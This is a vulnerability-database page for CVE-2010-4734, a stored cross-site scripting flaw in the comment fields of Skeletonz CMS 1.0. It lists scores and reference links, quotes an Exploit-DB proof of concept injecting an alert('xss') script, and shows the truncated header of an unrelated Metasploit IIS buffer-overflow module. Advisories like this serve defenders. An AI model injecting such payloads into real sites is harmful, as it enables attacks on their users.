CVE-2010-4734
published 2011-02-16CVE-2010-4734: Multiple cross-site scripting (XSS) vulnerabilities in the comment feature in Skeletonz CMS 1.0, when the Blog plugin is enabled, allow remote attackers to…
PriorityP412low2.6CVSS 2.0
AVNACHAuNCNIPAN
EXPLOIT
EPSS
1.78%
75.4th percentile
Multiple cross-site scripting (XSS) vulnerabilities in the comment feature in Skeletonz CMS 1.0, when the Blog plugin is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) Website, and (3) Email parameters. NOTE: some of these details are obtained from third party information.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Skeletonz CMS - Persistent Cross-Site Scripting
exploitdb·2010-11-28
CVE-2010-4734 Skeletonz CMS - Persistent Cross-Site Scripting
Skeletonz CMS - Persistent Cross-Site Scripting
---
# Exploit Title: Xss on skeletonz-simple dynamic cms in the section comments
# Google Dork:
# Date: 27/11/10
# Author: Jordan Diaz aka Jbyte
# Software Link: http://orangoo.com/skeletonz/
# Version: 1.0
# Tested on: Windows xp
# CVE :
The follow xss is located in the section of comments of the CMS skeletonz
Xss Exploit
field Name: alert('xss');field Comment: alert('xss');
Exploit-DB
Microsoft IIS - ISAPI RSA WebAgent Redirect Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2005-4734 Microsoft IIS - ISAPI RSA WebAgent Redirect Overflow (Metasploit)
Microsoft IIS - ISAPI RSA WebAgent Redirect Overflow (Metasploit)
---
##
# $Id: rsa_webagent_redirect.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft IIS ISAPI RSA WebAgent Redirect Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the SecurID Web
Agent for IIS. This ISAPI filter runs in-process with
inetinfo.exe, any attempt to exploit this flaw will result
in the termination and potential restart of the IIS service.
},
'Author' => [ 'hdm' ],
'License' => MSF_
No writeups or analysis indexed.
http://packetstormsecurity.org/files/view/96151/skeletonzcms-xss.txthttp://secunia.com/advisories/42385http://securityreason.com/securityalert/8081http://www.exploit-db.com/exploits/15625http://www.osvdb.org/69514http://www.securityfocus.com/bid/45081http://packetstormsecurity.org/files/view/96151/skeletonzcms-xss.txthttp://secunia.com/advisories/42385http://securityreason.com/securityalert/8081http://www.exploit-db.com/exploits/15625http://www.osvdb.org/69514http://www.securityfocus.com/bid/45081
2011-02-16
Published